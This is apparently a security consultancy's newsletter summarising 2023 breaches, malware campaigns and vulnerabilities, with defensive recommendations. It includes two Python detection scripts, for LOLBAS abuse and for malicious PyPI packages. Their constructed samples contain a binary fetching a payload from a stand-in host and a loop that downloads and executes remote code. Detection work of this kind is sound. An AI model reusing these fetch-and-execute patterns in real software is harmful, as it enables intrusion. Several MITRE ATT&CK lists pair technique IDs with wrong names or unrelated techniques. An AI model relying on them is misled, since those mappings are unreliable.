CyberWatch

Cyberattack Disrupts Hospital Computer Systems Across US, Oregon Health Data Breach Impacts Millions, and Top 2022 Vulnerabilities Revealed

By Access Point Consulting

At a Glance

Ransomware, Malware & Phishing

  1. Data breach affects 1.7 million Oregon Health Plan members
  2. Cyberattack disrupts hospital computer systems across US, hindering services
  3. Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats
  4. New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3
  5. Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners
  6. Malicious npm Packages Found Exfiltrating Sensitive Data from Developers
  7. LOLBAS in the Wild: 11 Living-Off-The-Land Binaries That Could Be Used for Malicious Purposes
  8. Clop ransomware now uses torrents to leak data and evade takedowns
  9. Fake VMware vConnector package on PyPI targets IT pros

Vulnerabilities

  1. Microsoft fixes flaw after being called irresponsible by Tenable CEO
  2. New PaperCut Vulnerability Allows Remote Code Execution
  3. FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022

Ransomware, Malware & Phishing

Data breach affects 1.7 million Oregon Health Plan members

Analysis: In a recent security incident, the MOVEit file transfer software suffered a breach that reverberated across the Oregon Department of Motor Vehicles (DMV) and the Oregon Health Plan (OHP) provider in June. This breach had far-reaching consequences, affecting a staggering 1.7 million members. The breach's origin lies in the exploitation of a well-known security vulnerability within the MOVEit software. The breach was brought to light by PH Tech, a healthcare provider contracting company, which promptly advised all OHP members to closely monitor their credit activities. Those impacted by the breach will soon receive notifications from PH Tech through mail, offering complimentary credit monitoring services.

Access Point recommends the following:

  1. Swift Application of Security Patches: Access Point strongly recommends organizations utilizing MOVEit Transfer to promptly apply the security patches provided by Progress Software. The immediate implementation of these patches is of utmost importance to effectively neutralize the vulnerability.
  2. Time-Sensitive Updates: Recognizing the critical role of time-sensitive updates, organizations must understand that such updates are pivotal in managing acknowledged security vulnerabilities and proactively preventing potential security breaches.
  3. Deactivation of HTTP/HTTPS Traffic: As an additional layer of defense, organizations are advised to deactivate all HTTP/HTTPS traffic to environments that might be susceptible to compromise. This proactive measure acts as a deterrent against unauthorized access, serving as a barrier for malicious actors attempting to exploit the vulnerability.
  4. Vigilance and Threat Detection: Maintaining continuous vigilance over the infrastructure is paramount. By doing so, organizations can efficiently detect and thwart potential threats. Implementing robust threat detection and monitoring systems is essential for promptly identifying any suspicious activities and preempting potential exploitation attempts.
  5. Industry Best Practices Adoption: To fortify cybersecurity defenses, organizations are strongly urged to adopt industry best practices. Key aspects include the implementation of multi-factor authentication, conducting regular security audits, and providing comprehensive training to employees for recognizing and effectively responding to potential threats.

By diligently adhering to these recommendations, organizations can significantly enhance their overall cybersecurity posture, reducing their vulnerability to security breaches and minimizing the potential far-reaching consequences of such incidents.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1486 - Data Encrypted for Impact
  • T1140 - Deobfuscate/Decode Files or Information
  • T1083 - File and Directory Discovery
  • T1562.001 - Impair Defenses: Disable or Modify Tools
  • T1490 - Inhibit System Recovery  
  • T1112 - Modify Registry
  • T1106 - Native API
  • T1135 - Network Share Discovery
  • T1027.002 - Obfuscated Files or Information: Software Packing
  • T1057 - Process Discovery
  • T1489 - Service Stop
  • T1518.001 - Software Discovery: Security Software Discovery
  • T1553.002 - Subvert Trust Controls: Code Signing
  • T1218.007 - System Binary Proxy Execution: Msiexec
  • T1614.001 - System Location Discovery: System Language Discovery
  • T1497.003 - Virtualization/Sandbox Evasion: Time Based Evasion

Cyberattack disrupts hospital computer systems across US, hindering services

Analysis: A recent wave of cyberattacks has targeted hospital computer systems across the United States, resulting in a cascade of disruptions. Emergency rooms in various states were forced to close, and ambulance diversions became necessary. The impact extended beyond immediate patient care, disrupting primary care services, elective surgeries, outpatient appointments, and even blood drives. The source of this incident is healthcare facilities operated by Prospect Medical Holdings, a California-based company with a presence in multiple states. In response, Prospect took a proactive approach, temporarily shutting down its systems, engaging third-party cybersecurity experts for an investigation, and placing patient needs at the forefront while striving to restore normal operations.

Access Point recommends the following:

  1. Regular Security Audits: Healthcare organizations should conduct routine security audits to identify vulnerabilities in their systems. This practice assists in fine-tuning cybersecurity measures and staying ahead of potential threats.
  2. Cybersecurity Training: Employees should undergo comprehensive cybersecurity training to enhance their ability to identify phishing attempts, suspicious links, and other potential threats. This education empowers staff to play an active role in safeguarding digital assets.
  3. Network Segmentation: Implement network segmentation to create isolated environments for critical healthcare systems. This approach limits the potential impact of cyberattacks, preventing unauthorized access to sensitive data.
  4. Multi-Factor Authentication: Enforce the use of multi-factor authentication for accessing sensitive systems and data. This additional layer of security adds complexity to unauthorized access attempts.
  5. Data Backups: Maintain frequent and encrypted backups of essential patient data and hospital operations. This precaution ensures data recovery and continuity in the event of a cyber incident.
  6. Regular Updates: Keep software and systems up to date with the latest security patches. Regular updates are crucial in addressing known vulnerabilities and fortifying defenses.
  7. Incident Response Plan: Develop a comprehensive incident response plan outlining clear steps to take during a cyberattack. This plan should encompass communication protocols, strategies for containment, and recovery procedures with minimal disruption to business operations.

Microsoft Exposes Russian Hackers' Sneaky Phishing Tactics via Microsoft Teams Chats

Analysis: Microsoft recently exposed a series of targeted social engineering attacks orchestrated by a Russian nation-state threat actor known as Midnight Blizzard, also identified as APT29, BlueBravo, Cozy Bear, Iron Hemlock, and The Dukes. These attacks employed cunning tactics, leveraging the Microsoft Teams platform to deploy phishing lures with the intent of stealing user credentials. The threat actor exploited previously compromised Microsoft 365 tenants to establish new domains, masquerading as technical support entities. Operating through Teams messages, the attacker manipulated users into approving multi-factor authentication (MFA) prompts, thereby attempting to pilfer their credentials. This campaign, active since at least late May 2023, impacted a limited number of organizations, fewer than 40 globally and spanning various sectors.

Access Point recommends the following:

  1. Employee Education: Organizations should prioritize educating their employees about the perils of social engineering attacks, particularly those delivered via platforms like Microsoft Teams. Employees need to exercise caution when engaging with unsolicited messages and remain vigilant regarding techniques employed by threat actors to extract sensitive information.
  2. Multi-Factor Authentication Vigilance: Proper configuration and monitoring of multi-factor authentication mechanisms are essential. Thorough scrutiny of user approvals for MFA prompts can effectively deter unauthorized access attempts.
  3. Security Assessments and Penetration Testing: Conducting regular security assessments and penetration testing can uncover vulnerabilities, including token theft techniques, authentication spear-phishing, password spray, and brute-force attacks. Identifying and addressing these vulnerabilities is crucial to safeguarding against potential breaches.
  4. Comprehensive Monitoring: Organizations should maintain vigilant monitoring across both cloud and on-premises environments to detect any suspicious activities and thwart lateral movement by threat actors.
  5. Robust Threat Detection and Response: Having robust threat detection and response capabilities in place is critical. These capabilities ensure timely identification of unauthorized access attempts, enabling swift and effective countermeasures.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1552 - Use Alternate Authentication Material: Token-Based Systems (Token Theft)
  • T1566 - Phishing
  • T1110 - Brute Force
  • T1105 - Ingress Tool Transfer
  • T1190 - Exploit Public-Facing Application  
  • T1071 - Application Layer Protocol
  • T1078 - Valid Accounts
  • T1550 - Use Alternate Authentication Material: Web Session Cookie

New Version of Rilide Data Theft Malware Adapts to Chrome Extension Manifest V3

Analysis: Security researchers have recently uncovered a newly emerged strain of malware named Rilide, specifically designed to target Chromium-based web browsers. This malicious software exhibits a remarkably high level of sophistication, featuring a modular design, intricate code obfuscation techniques, and adaptation to the Chrome Extension Manifest V3. Rilide's capabilities encompass data theft and cryptocurrency heists, making it a potent threat.

Notably, the malware has the ability to exfiltrate stolen information to a Telegram channel and capture screenshots at specified intervals. First documented in April 2023, Rilide leverages the Ekipa Remote Access Trojan (RAT) and the Aurora Stealer to deploy rogue browser extensions, paving the way for data and cryptocurrency theft. The malware's vendor, known as "friezer," has offered Rilide for sale on dark web forums at a price of $5,000.

The malware's functionality extends to disabling other browser add-ons, collecting login credentials, extracting browsing history and cookies, and even injecting malicious scripts to facilitate unauthorized withdrawals from cryptocurrency exchanges.

Access Point recommends the following:

  1. Regular Software Updates: Keeping web browsers and extensions up to date is crucial. Regular updates serve to patch known vulnerabilities and bolster defense mechanisms against malware like Rilide.
  2. Cautious Downloads: Avoid downloading extensions or applications from unofficial or unverified sources. Stick to the official Chrome Web Store and verified app repositories to minimize exposure to potentially malicious software.
  3. Vigilance with Links and Downloads: Exercise caution when interacting with links or downloading files from unfamiliar sources. This is particularly important when dealing with purported popular applications like Palo Alto Networks' GlobalProtect app. Prioritize source verification before proceeding with installations.
  4. Multi-Factor Authentication (MFA): Enabling MFA whenever possible adds an extra layer of security to online accounts, shielding them from unauthorized access attempts.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1027 - Obfuscated Files or Information
  • T1064 - Scripting
  • T1197 - BITS Jobs
  • T1105 - Ingress Tool Transfer
  • T1117 - Regsvr32
  • T1021 - Remote Services

Malicious Apps Use Sneaky Versioning Technique to Bypass Google Play Store Scanners

Analysis: Threat actors have recently employed a technique known as versioning to circumvent Google Play Store's malware detection mechanisms, increasing the risk to Android users. The method is a two-step process: developers first release an app version that passes Google's pre-publication checks, then push an update that introduces a concealed malware component. These updates are served from attacker-controlled servers, and dynamic code loading (DCL) is used to deliver the malicious code onto users' devices, so the seemingly legitimate app becomes a backdoor for cybercriminal activity. Versioning has been used in campaigns that harvest user credentials, sensitive data, and financial information; notable malware employing it includes "iRecorder - Screen Recorder" and SharkBot, a financial trojan.

Access Point recommends the following:

  1. Trustworthy Sources: Android users should exclusively download apps from reputable sources, such as the Google Play Store. This practice substantially minimizes the likelihood of installing malicious applications.
  2. Google Play Protect: Enabling Google Play Protect offers an additional layer of security. This feature identifies potentially harmful apps (PHAs) and alerts users regarding their presence on the device.
  3. Regular Updates: Ensuring that both the Android operating system and apps are up to date is critical. Regular updates guarantee the application of the latest security patches, reducing the potential for exploitation by threat actors.
  4. Enterprise Precautions: In enterprise environments, it is advisable to adopt defense-in-depth principles. This might involve restricting application installation sources to trusted platforms like Google Play or managing corporate devices via a mobile device management (MDM) platform.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1027 - Obfuscated Files or Information
  • T1105 - Ingress Tool Transfer
  • T1203 - Exploitation for Client Execution
  • T1102 - Web Service
  • T1003 - OS Credential Dumping
  • T1505 - Server Software Component
  • T1570 - Lateral Tool Transfer
  • T1556.001 - Modify Registry
  • T1117 - Regsvr32
  • T1195 - BITS Jobs

Malicious npm Packages Found Exfiltrating Sensitive Data from Developers

Analysis: In a concerning development, cybersecurity researchers have recently unearthed a fresh wave of malicious packages residing within the npm package registry. These packages are meticulously crafted to covertly exfiltrate sensitive developer information. Detected by software supply chain firm Phylum on July 31, 2023, these packages exhibited an escalating level of sophistication. Notably, they were subsequently removed from the registry, only to be re-uploaded under different, seemingly legitimate names. The malicious packages, attributed to the npm user "malikrukd4732," employ a JavaScript file ("index.js") to initiate exfiltration of crucial data to a remote server.

Of significant concern is the suspicion that these packages target the cryptocurrency sector. Their functionality involves harvesting operating system details and conducting searches for specific file extensions like .env, .svn, and .gitlab. The captured data, which could encompass sensitive credentials and valuable intellectual property, is then transmitted in the form of a ZIP archive file to a remote server.

Access Point recommends the following:

  1. Thorough Package Review: Developers must exercise utmost caution and conduct comprehensive assessments of third-party packages before incorporating them into their applications. Prioritize trusted and well-reviewed packages from reputable sources.
  2. Dependency Monitoring: Regular monitoring of dependencies is essential to identify any unusual behavior or updates that may introduce malicious code. Leveraging automated tools to detect anomalies in package versions and contents can be highly effective.
  3. Secure Coding Practices: Adhering to secure coding practices is vital to minimize the possibility of introducing vulnerabilities or malicious code into software projects. Robust coding practices serve as a robust barrier against potential threats.
  4. Access Restriction: To safeguard sensitive files and directories, particularly those containing valuable credentials and intellectual property, implement strict access controls. Restricting unauthorized access can thwart potential data breaches.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1071 - Application Layer Protocol
  • T1078 - Valid Accounts
  • T1003 - OS Credential Dumping
  • T1005 - Data from Local System
  • T1204 - User Execution
  • T1027 - Obfuscated Files or Information
  • T1570 - Lateral Tool Transfer
  • T1566.001 - Phishing
  • T1505 - Server Software Component

LOLBAS in the Wild: 11 Living-Off-The-Land Binaries That Could Be Used for Malicious Purposes

Analysis: Cybersecurity experts have uncovered 11 living-off-the-land binaries-and-scripts (LOLBAS) that could potentially facilitate post-exploitation activities, posing a significant threat to system security. The LOLBAS approach involves leveraging existing system binaries and scripts for malicious purposes, making it challenging for security teams to distinguish between genuine and harmful activities, as these actions are executed by trusted system utilities.

Israeli cybersecurity firm Pentera's research has unveiled nine LOLBAS downloaders and three executors that could empower threat actors to download and execute more potent malware on compromised hosts. The identified LOLBAS include seemingly innocuous binaries such as MsoHtmEd.exe, Mspub.exe, ProtocolHandler.exe, ConfigSecurityPolicy.exe, InstallUtil.exe, Mshta.exe, Presentationhost.exe, Outlook.exe, MSAccess.exe, scp.exe, and sftp.exe. While this list pertains to Microsoft-related LOLBAS, attackers could potentially leverage other executables from software beyond the Microsoft ecosystem to achieve similar goals.

A comprehensive attack chain involves hackers using LOLBAS downloaders to acquire more advanced malware, which is then surreptitiously executed through LOLBAS executors, ensuring a legitimate appearance within the system's process tree.
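One way to turn the list of binaries above into a detection is to watch process-creation telemetry for two narrow conditions: a listed binary invoked with a remote source on its command line (the downloader half of the chain), and a listed binary acting as the parent of something started from a user-writable directory (the executor half). The Python below is an added example, not code from Pentera or from the original article; it assumes Sysmon Event ID 1-style JSON fields (Image, CommandLine, ParentImage, ProcessId), and every event line is constructed.

```python
"""Triage of process-creation events for the eleven binaries named above.
Two narrow heuristics: a listed binary whose command line names a remote
source (URL, UNC path or scp-style host spec), and a listed binary that is
the parent of an image started from a user-writable directory. Field names
follow Sysmon Event ID 1 exports; all events below are constructed."""
import json
import re
from pathlib import PureWindowsPath

# The binaries from the Pentera research, compared case-insensitively by file name.
LOLBAS = {name.lower() for name in (
    "MsoHtmEd.exe", "Mspub.exe", "ProtocolHandler.exe", "ConfigSecurityPolicy.exe",
    "InstallUtil.exe", "Mshta.exe", "Presentationhost.exe", "Outlook.exe",
    "MSAccess.exe", "scp.exe", "sftp.exe")}

REMOTE_SOURCE = re.compile(
    r"https?://\S+"              # web URL
    r"|\\\\[^\\\s]+\\\S+"        # UNC path \\host\share\...
    r"|\b[\w.-]+@[\w.-]+:\S*",   # scp/sftp style user@host:path
    re.IGNORECASE)

# Locations an unprivileged user can write to; a LOLBAS parent launching an
# image from here is the "executor" half of the chain described in the article.
USER_WRITABLE = re.compile(
    r"^[a-z]:\\(?:users\\[^\\]+\\(?:appdata|downloads|desktop|documents)"
    r"|temp|windows\\temp|programdata)\\",
    re.IGNORECASE)


def _basename(path):
    """Lower-cased file name of a Windows path, '' when the field is missing."""
    return PureWindowsPath(path).name.lower() if path else ""


def triage_event(ev):
    """Return (rule, detail) tuples for one process-creation event."""
    alerts = []
    image = _basename(ev.get("Image"))
    parent = _basename(ev.get("ParentImage"))
    command = ev.get("CommandLine", "")
    if image in LOLBAS:
        hit = REMOTE_SOURCE.search(command)
        if hit:
            alerts.append(("lolbas-remote-fetch",
                           f"{image} invoked with remote source {hit.group(0)}"))
    if parent in LOLBAS and USER_WRITABLE.match(ev.get("Image", "")):
        alerts.append(("lolbas-spawned-from-user-dir",
                       f"{parent} started {ev['Image']}"))
    return alerts


def triage_log(jsonl):
    """Run triage_event over newline-delimited JSON events; alerts keyed by ProcessId."""
    results = {}
    for line in jsonl.splitlines():
        if not line.strip():
            continue
        event = json.loads(line)
        hits = triage_event(event)
        if hits:
            results[event["ProcessId"]] = hits
    return results


# Constructed Sysmon-style events: one download-style invocation, one child
# launched by mshta.exe from %TEMP%, a plain Outlook start, an scp transfer
# and an unrelated notepad.exe, to show what does and does not alert.
SAMPLE_EVENTS = r'''
{"ProcessId": 4100, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\MsoHtmEd.exe", "CommandLine": "\"MsoHtmEd.exe\" https://files.example.invalid/update.bin", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"ProcessId": 4112, "Image": "C:\\Users\\alice\\AppData\\Local\\Temp\\stage2.exe", "CommandLine": "stage2.exe", "ParentImage": "C:\\Windows\\System32\\mshta.exe"}
{"ProcessId": 4120, "Image": "C:\\Program Files\\Microsoft Office\\root\\Office16\\OUTLOOK.EXE", "CommandLine": "\"OUTLOOK.EXE\"", "ParentImage": "C:\\Windows\\explorer.exe"}
{"ProcessId": 4133, "Image": "C:\\Windows\\System32\\OpenSSH\\scp.exe", "CommandLine": "scp.exe deploy@build-host.example:/srv/build.tar C:\\Temp\\", "ParentImage": "C:\\Windows\\System32\\cmd.exe"}
{"ProcessId": 4140, "Image": "C:\\Windows\\System32\\notepad.exe", "CommandLine": "notepad.exe notes.txt", "ParentImage": "C:\\Windows\\explorer.exe"}
'''

if __name__ == "__main__":
    for pid, hits in triage_log(SAMPLE_EVENTS).items():
        for rule, detail in hits:
            print(f"{pid}: {rule}: {detail}")
```

Outlook.exe, scp.exe and sftp.exe handle remote sources legitimately, so the first rule needs a baseline of expected hosts before it moves from hunting to alerting.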

In parallel to these discoveries, Vectra disclosed an attack vector revolving around Microsoft Entra ID's cross-tenant synchronization (CTS) feature. This vector enables lateral movement to other tenants in the event of a privileged identity's compromise within the cloud environment. Attackers can exploit existing CTS configurations to move laterally between interconnected tenants, while a rogue Cross Tenant Access configuration can sustain persistent access within a compromised tenant.

Access Point recommends the following:

  1. Conduct Regular Audits and Assessments: Regular security audits and assessments can help identify and mitigate vulnerabilities and potential risks, including those associated with LOLBAS and other attack vectors.
  2. Robust Monitoring and Detection: Implement robust monitoring and detection mechanisms to swiftly identify suspicious activities tied to known LOLBAS and other binaries or scripts utilized for post-exploitation activities.
  3. User Training: Educate users to recognize and report potential security threats, including LOLBAS-related activities, enabling prompt response and mitigation.
  4. Advanced Endpoint Security Solutions: Leverage advanced endpoint security solutions capable of detecting and thwarting malicious activities tied to LOLBAS and other living-off-the-land techniques.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1059 - Command and Scripting Interpreter
  • T1112 - Modify Registry
  • T1047 - Windows Management Instrumentation
  • T1197 - BITS Jobs
  • T1218 - Signed Binary Proxy Execution
  • T1041 - Exfiltration Over C2 Channel
  • T1064 - Scripting
  • T1204 - User Execution
  • T1070 - Indicator Removal on Host

Clop ransomware now uses torrents to leak data and evade takedowns

Analysis: The Clop ransomware gang has shifted its extortion tactics by utilizing torrents to distribute data stolen in MOVEit attacks. Starting on May 27th, the threat actors exploited a zero-day vulnerability in the MOVEit Transfer secure file transfer platform to pilfer data from nearly 600 organizations globally. On June 14th, Clop began extorting victims, listing names on their Tor data leak site, and subsequently releasing the purloined files to the public. However, the use of Tor sites was hampered by slow download speeds, limiting the impact of the data leak. To overcome this limitation, Clop has transitioned to employing torrents for data distribution.

Torrents have proven to be a more effective method for distributing stolen data. By creating torrents for twenty victims, including notable organizations such as Aon, K & L Gates, Putnam, Delaware Life, Zurich Brazil, and Heidelberg, the ransomware gang achieves faster data transfer through peer-to-peer sharing among users. Speed tests conducted by BleepingComputer indicate significantly improved performance compared to traditional Tor data leak sites, reaching 5.4 Mbps data transfer speeds.

This new distribution strategy is decentralized, rendering it difficult for law enforcement to halt. Even if the original seeder becomes inaccessible, other devices can assume the seeding role, ensuring uninterrupted data distribution. Clop's adoption of torrents could result in wider and faster dissemination of pilfered data, amplifying the pressure on victims to meet ransom demands. Projections suggest the ransomware gang could amass $75-$100 million in extortion payments, predominantly from a limited number of companies making substantial ransom payments.

Access Point recommends the following:

  1. Regular Patching: Consistently update software and applications with the latest patches and security fixes to mitigate the risk of zero-day vulnerabilities.
  2. Secure Backups: Maintain secure and up-to-date backups of critical data to minimize the impact of ransomware attacks and reduce reliance on ransom payments.
  3. Network Segmentation: Implement network segmentation to curtail the lateral spread of ransomware within the network, limiting its impact.
  4. Incident Response Planning: Develop and routinely test an incident response plan to effectively handle ransomware attacks and other cybersecurity incidents with minimal disruption to business operations.

Fake VMware vConnector package on PyPI targets IT pros

Analysis: A concerning incident has come to light involving the upload of a malicious package named 'VMConnect' onto the Python Package Index (PyPI). This package impersonated the widely-used 'vConnector' module for VMware vSphere connectors, a tool extensively utilized by developers and IT professionals. The package was introduced on July 28, 2023, and managed to be downloaded 237 times before its removal on August 1, 2023. Subsequent investigation by Sonatype exposed two more malicious packages, 'ethter' and 'quantiumbase,' both harboring identical code.

The 'ethter' package emulated the legitimate 'eth-tester,' while 'quantiumbase' replicated the 'databases' package. These malicious packages aimed to deceive users into believing they were using legitimate tools, potentially prolonging the period of infection. Notably, the 'VMConnect' package contained code within its '__init__.py' file that exhibited signs of malicious intent. This code included a base64-encoded string that, when decoded, was executed in a separate process. It periodically retrieved data from an attacker-controlled URL and executed it on the compromised machine. The URL was disguised as an image file but served plaintext code instead.

Efforts to retrieve the second-stage payload from the external source proved unsuccessful. Nonetheless, the covert communication with the obscure external URL highlighted high-risk behavior, even though the specific payload remained undisclosed. ReversingLabs also corroborated this campaign, publishing a report, though conclusive insights regarding the threat actor, second-stage payload, and ultimate objectives remained elusive.

The attackers displayed a level of sophistication by providing accurate and realistic package descriptions on PyPI. They even crafted matching GitHub repositories, compounding the challenge for developers in detecting malicious activities. While there were indications, such as limited history, low download counts, obscured code within files, and subtly altered package names, these red flags were not easily discernible.
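The two indicators described above, a base64 literal handed to a child interpreter and a sleep loop that fetches and executes remote content, can be triaged statically before a package is ever installed. The following Python scanner is an added example, not code from the original write-up or from Sonatype or ReversingLabs; the rule names, the sample '__init__.py' texts and the base64 literal (which decodes to a harmless print call) are constructed for illustration, and the scanner parses source without executing it.

```python
"""Static triage of a package's __init__.py for the pattern described above: a
base64 literal decoded and handed to exec() or a child interpreter, and a sleep
loop that fetches remote content and executes it. Parses only; never runs code."""
import ast
import base64
import binascii
import re
from collections import namedtuple

CODE_SINKS = {"exec", "eval"}
DECODERS = {"b64decode", "b32decode", "b85decode", "a85decode", "decodebytes"}
SPAWN_CALLS = {"subprocess.Popen", "subprocess.run", "subprocess.call",
               "multiprocessing.Process", "threading.Thread", "os.system", "os.popen"}
FETCH_CALLS = {"urllib.request.urlopen", "urllib.request.urlretrieve",
               "requests.get", "requests.post"}
B64_LITERAL = re.compile(r"^[A-Za-z0-9+/]{32,}={0,2}$")  # long, alphabet-only literal
Finding = namedtuple("Finding", "line rule detail")


def _dotted(node):
    """Render a Name/Attribute chain such as urllib.request.urlopen as text."""
    parts = []
    while isinstance(node, ast.Attribute):
        parts.append(node.attr)
        node = node.value
    if isinstance(node, ast.Name):
        parts.append(node.id)
        return ".".join(reversed(parts))
    return ""  # callee is itself a call or subscript, not a plain name


def _uses(node, names):
    """True if any call under node targets one of names (full or last segment)."""
    for sub in ast.walk(node):
        if isinstance(sub, ast.Call):
            callee = _dotted(sub.func)
            if callee in names or callee.split(".")[-1] in names:
                return True
    return False


def _payload_kind(literal):
    """Decode a long base64 literal and say whether the bytes are Python source."""
    try:
        raw = base64.b64decode(literal, validate=True)
    except (binascii.Error, ValueError):
        return None  # not real base64 (e.g. a long identifier): ignore it
    try:
        ast.parse(raw.decode("utf-8"))
    except (ValueError, SyntaxError):  # UnicodeDecodeError is a ValueError
        return "long base64 literal decodes to non-Python bytes"
    return "long base64 literal decodes to valid Python source"


def scan_source(src):
    """Return Findings for one module's source text, ordered by line number."""
    findings = []
    for node in ast.walk(ast.parse(src)):
        if isinstance(node, ast.Constant) and isinstance(node.value, str):
            kind = _payload_kind(node.value) if B64_LITERAL.match(node.value) else None
            if kind:
                findings.append(Finding(node.lineno, "encoded-literal", kind))
        elif isinstance(node, ast.Call):
            callee = _dotted(node.func)
            if callee in CODE_SINKS and (_uses(node, DECODERS) or _uses(node, FETCH_CALLS)):
                findings.append(Finding(node.lineno, "decode-or-fetch-then-exec",
                                        f"{callee}() runs decoded or downloaded content"))
            elif callee in SPAWN_CALLS and _uses(node, DECODERS):
                findings.append(Finding(node.lineno, "decode-then-spawn",
                                        f"{callee}() started with decoded content"))
        elif isinstance(node, ast.While):
            if _uses(node, {"time.sleep", "sleep"}) and _uses(node, FETCH_CALLS):
                findings.append(Finding(node.lineno, "beacon-loop",
                                        "sleep loop that fetches remote content"))
    return sorted(findings, key=lambda f: f.line)


def triage(src):
    """'high' when decoded or downloaded data is executed, 'medium' for the
    weaker indicators on their own, 'none' when nothing matched."""
    rules = {f.rule for f in scan_source(src)}
    if rules & {"decode-or-fetch-then-exec", "decode-then-spawn"}:
        return "high"
    return "medium" if rules else "none"


# Constructed __init__.py mirroring the layout described in the write-up. The
# literal decodes to print('constructed sample'); the scanner never runs it.
SUSPECT_INIT_PY = '''\
import base64, subprocess, sys, time
import urllib.request
_BLOB = "cHJpbnQoJ2NvbnN0cnVjdGVkIHNhbXBsZScp"
def _poll(url):
    while True:
        exec(urllib.request.urlopen(url).read())
        time.sleep(60)
subprocess.Popen([sys.executable, "-c", base64.b64decode(_BLOB).decode()])
'''

# Constructed benign __init__.py: a re-export and a version string only.
CLEAN_INIT_PY = 'from .client import connect  # noqa: F401\n__version__ = "1.2.0"\n'

if __name__ == "__main__":
    for f in scan_source(SUSPECT_INIT_PY):
        print(f"line {f.line}: {f.rule} ({f.detail})")
```

To triage a downloaded distribution, call scan_source on the text of each __init__.py in the extracted archive; a "high" verdict warrants manual review before the package is installed anywhere.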

Access Point recommends the following:

  1. Source Verification: Before downloading and utilizing packages, ensure the authenticity of the source and check for any suspicious behavior or inconsistencies.
  2. Investigate Package History: Scrutinize the history and download counts of packages, particularly if they are new or exhibit low download statistics.
  3. Code Examination: Thoroughly review package code for any indications of malicious intent, such as hidden or obfuscated code.
  4. Trusted Repositories: Rely on well-known and reputable repositories when acquiring packages to mitigate the risk of downloading malicious software.
  5. Regular Updates: Maintain software up-to-date by performing regular updates and patching to thwart potential exploitation attempts.

MITRE ATT&CK Technique Numbers associated with this campaign include:

  • T1518 - Initial Access: Software Discovery  
  • T1105 - Execution: Remote File Copy  
  • T1027 - Defense Evasion: Obfuscated Files or Information  
  • T1105 - Command and Control: Remote File Copy  

Vulnerabilities

Microsoft fixes flaw after being called irresponsible by Tenable CEO

Analysis: Microsoft recently addressed a significant vulnerability within its Power Platform Custom Connectors feature. The flaw stemmed from inadequate access controls for Azure Function hosts associated with these connectors. While these connectors are designed to interact through authenticated APIs, a lapse allowed unauthorized requests to bypass authentication. This created an opportunity for malicious actors to potentially exploit unprotected Azure Function hosts, gaining access to sensitive data such as OAuth client IDs.

Tenable, a cybersecurity company, brought this vulnerability to light, emphasizing its severity after discovering bank authentication secrets at risk. Following their discovery, Tenable promptly communicated the issue to Microsoft. Initially, Microsoft believed only Tenable's researchers had exploited the vulnerability, but further analysis revealed inadequately secured Azure Functions beyond their attempts.

Microsoft's initial attempt to address the issue on June 7th was deemed insufficient by Tenable. However, by August 2nd, Microsoft declared the vulnerability fully resolved and informed affected clients via the Microsoft 365 Admin Center by August 4th. Despite this, Tenable indicated that the fix primarily targeted recently launched Power Apps and Power Automate custom connectors, potentially leaving clients with earlier setups seeking clarity on the remediation measures.

Tenable's CEO, Amit Yoran, criticized Microsoft's initial response as "grossly irresponsible." The industry norm is to rectify such vulnerabilities within 90 days, and Microsoft's proposed timeline for resolution appeared extended. This delay, combined with concerns about Microsoft's swift action on security vulnerabilities, raised further apprehensions. Yoran underscored the lingering risk for organizations that had utilized the service prior to the eventual fix, emphasizing the urgency of risk mitigation.

Access Point recommends the following:

  1. Security Review: Organizations should promptly review the security of their Azure Function hosts to ensure they are not vulnerable.
  2. Coordination with Microsoft: Directly engage with Microsoft to gain a comprehensive understanding of the remediation efforts undertaken, ensuring that legacy setups are not at risk.
  3. Consistent Audits: Regularly audit system integrations and external connectors to identify and address potential security gaps.
  4. Stay Informed: Remain informed about industry vulnerabilities and patches to quickly address emerging security concerns.

New PaperCut Vulnerability Allows Remote Code Execution

Analysis: Organizations utilizing PaperCut NG/MF print management software are facing a new and significant security concern, as a high-severity vulnerability (CVE-2023-39143) has been identified. This flaw can potentially allow unauthenticated attackers to read or write arbitrary files, posing a grave risk of remote code execution in specific configurations. Notably, the vulnerability is most pronounced on PaperCut servers running on Windows, particularly if the external device integration setting is enabled, which is the default in installations such as the PaperCut NG Commercial version and PaperCut MF. The security firm Horizon3, responsible for the discovery, has indicated that a substantial number of PaperCut installations could be susceptible to this vulnerability.

As a precautionary measure, Horizon3 has chosen to withhold specific technical details of the vulnerability to deter malicious exploitation. However, they have provided organizations with a command to assess the vulnerability status of their PaperCut servers. In response, PaperCut has swiftly introduced a patch in version 22.1.3, which addresses this specific vulnerability and other potential threats. They have also included recommended mitigation measures.

While there is no evidence of the CVE-2023-39143 vulnerability being actively exploited, it's noteworthy that another recent vulnerability in PaperCut, CVE-2023-27350, has gained attention from ransomware syndicates and state-sponsored threat actors. Both these vulnerabilities can be exploited without requiring user interaction or authentication. Exploiting CVE-2023-39143 is considered more intricate, demanding the exploitation of several bugs in tandem. PaperCut has classified this flaw as two path traversal bugs and emphasized that attackers would need direct server IP access for effective exploitation.

Access Point recommends the following:

  1. Apply Patches: Update systems to PaperCut version 22.1.3 promptly to address the identified vulnerabilities.
  2. Check Configuration: Verify whether the external device integration setting is enabled on PaperCut servers and follow Horizon3's guidance to assess whether the server is vulnerable.
  3. Security Audits: Consider conducting regular security audits to ensure ongoing system integrity.
  4. Continuous Monitoring: Keep a vigilant watch for any unusual activity, particularly on PaperCut servers whose IP address is directly reachable, since exploitation requires direct access to the server.

FBI, CISA, and NSA reveal top exploited vulnerabilities of 2022

Analysis: Numerous prominent cybersecurity authorities, including CISA, NSA, and the FBI, have collaborated with the Five Eyes alliance to release a list of the twelve most exploited vulnerabilities in 2022. Threat actors have increasingly targeted outdated software vulnerabilities, focusing on attacking unpatched systems exposed on the internet, rather than immediately exploiting recently disclosed vulnerabilities. The availability of proof-of-concept code in the public domain has facilitated these malicious cyber activities.

